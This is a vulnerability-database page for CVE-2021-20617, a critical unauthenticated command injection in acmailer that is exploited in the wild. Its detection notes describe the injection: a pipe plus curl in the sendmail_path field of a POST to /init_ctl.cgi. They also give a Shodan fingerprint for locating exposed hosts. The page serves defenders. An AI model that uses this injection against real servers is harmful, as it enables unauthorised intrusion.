CVE-2021-20617
published 2021-01-14CVE-2021-20617: Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an…
PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
7.87%
94.0th percentile
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acmailer | acmailer | <= 4.0.1 | — |
| acmailer | acmailer_db | <= 1.1.3 | — |
| seeds_co_ltd | acmailer_and_acmailer_db | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit targets the /init_ctl.cgi endpoint via HTTP POST with a pipe-injected sendmail_path parameter to trigger OS command execution via curl callback (OOB/OAST detection). ↗
- →Successful exploitation results in an HTTP 302 redirect response; monitor for 302 responses from /init_ctl.cgi combined with OOB curl callbacks. ↗
- →OOB confirmation: look for inbound HTTP requests with 'User-Agent: curl' originating from the target server after a POST to /init_ctl.cgi. ↗
- →Content-Type of the exploit request is application/x-www-form-urlencoded; filter POST requests to /init_ctl.cgi with this content type and a pipe character in the sendmail_path field. ↗
- →Exposed acmailer instances can be discovered via Shodan/FOFA using the title fingerprint 'ACMAILER4.0'; use this to identify internet-facing vulnerable assets. ↗
- ·The exploit payload uses a pipe-injected sendmail_path (|curl ...) to achieve OS command injection; the injection vector is the sendmail_path POST parameter, not a separate binary or config file. ↗
- ·Vulnerability affects acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier; scope is limited to these version ranges. ↗
- ·The attack vector is unauthenticated (PR:N, UI:N) — no prior authentication or user interaction is required to exploit /init_ctl.cgi. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6456-hr4p-p4pq: Improper access control vulnerability in acmailer ver
ghsa_unreviewed·2022-05-24
CVE-2021-20617 [CRITICAL] CWE-269 GHSA-6456-hr4p-p4pq: Improper access control vulnerability in acmailer ver
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
VulnCheck
Acmailer and Acmailer DB Survey Function Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-20617 [CRITICAL] Acmailer and Acmailer DB Survey Function Vulnerability
Acmailer and Acmailer DB Survey Function Vulnerability
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
Affected: acmailer acmailer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-12-05&host_type=src&vulnerability=cve-2021-20617; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-06-08&host_t
No detection rules found.
Nuclei
Acmailer - Improper Access Control to OS Command Injection
nuclei·CVSS 9.8
CVE-2021-20617 [CRITICAL] Acmailer - Improper Access Control to OS Command Injection
Acmailer - Improper Access Control to OS Command Injection
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
Template:
id: CVE-2021-20617
info:
name: Acmailer - Improper Access Control to OS Command Injection
author: daffainfo
severity: critical
description: |
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server vi
No writeups or analysis indexed.
2021-01-14
Published
Exploited in the wild